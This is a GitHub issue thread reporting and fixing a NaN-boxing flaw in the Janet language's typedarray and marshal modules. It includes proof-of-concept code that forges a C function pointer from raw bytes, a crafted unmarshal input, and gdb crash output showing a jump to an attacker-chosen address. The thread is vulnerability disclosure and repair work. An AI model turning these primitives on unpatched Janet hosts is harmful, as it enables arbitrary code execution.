### ISSUE TITLE
Security vulnerability in typedarray and marshal allows creating arbitrary objects

### ISSUE THREAD

**Issue by Barakat** [janet-lang/janet#142]
There is a security vulnerability in typedarray which allows creating arbitrary objects exploiting NaN-boxing. A buffer that contains untrusted data viewed as float64 may contain a NaN-boxed object.

This is a PoC where a float64 is interpreted as C function pointer:

```jant
(def buffer (tarray/buffer 8))
(def buffer-float64-view (tarray/new :float64 1 1 0 buffer))
(def buffer-uint32-view (tarray/new :uint32 2 1 0 buffer))

(set (buffer-uint32-view 1) 0xfffe9234)
(set (buffer-uint32-view 0) 0x56789abc)

(print "object: " (buffer-float64-view 0))
(print "  type: " (type (buffer-float64-view 0)))

((buffer-float64-view 0))
```

Under gdb:

```$ gdb -q ./janet
Reading symbols from ./janet...(no debugging symbols found)...done.
(gdb) r ../../poc.jant
Starting program: /mnt/c/Users/Barakat/Desktop/janet/build/janet ../../poc.jant
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
object: <cfunction 0x123456789ABC>
  type: cfunction

Program received signal SIGSEGV, Segmentation fault.
0x0000123456789abc in ?? ()
(gdb)
```

**Comment by bakpakin** [comment]
I think a robust solution to this would be an api function janet_wrap_number_safe, which would act like normal janet_wrap_number, but normalize any strange forms of NaN to one that was compatible with Nanboxing. This problem could potentially pop up in other places as well, but in general can only happen when there is unchecked, user provided input to janet_unwrap_number. Machine generated NaNs will never trigger this, so the current codebase is otherwise safe besides the typed arrays module.

Having Janet_wrap_number do this check all the time seems too costly.

**Comment by Barakat** [comment]
There is also the module `marshal` which has a similar issue:

```
barakat@Workstation:/mnt/c/Users/Barakat/Desktop/janet/build$ ./janet
Janet 1.1.0-dev-6887dd0  Copyright (C) 2017-2019 Calvin Rose
janet:0:> (unmarshal @"\xC8\xbc\x9axV4\x92\xfe\xff")
<cfunction 0x123456789ABC>
janet:43:>
```

**Comment by bakpakin** [comment]
I think I have fixed the issue and added some test cases to the test suite 7. For more issues of the same kind, this issue can be reopened.
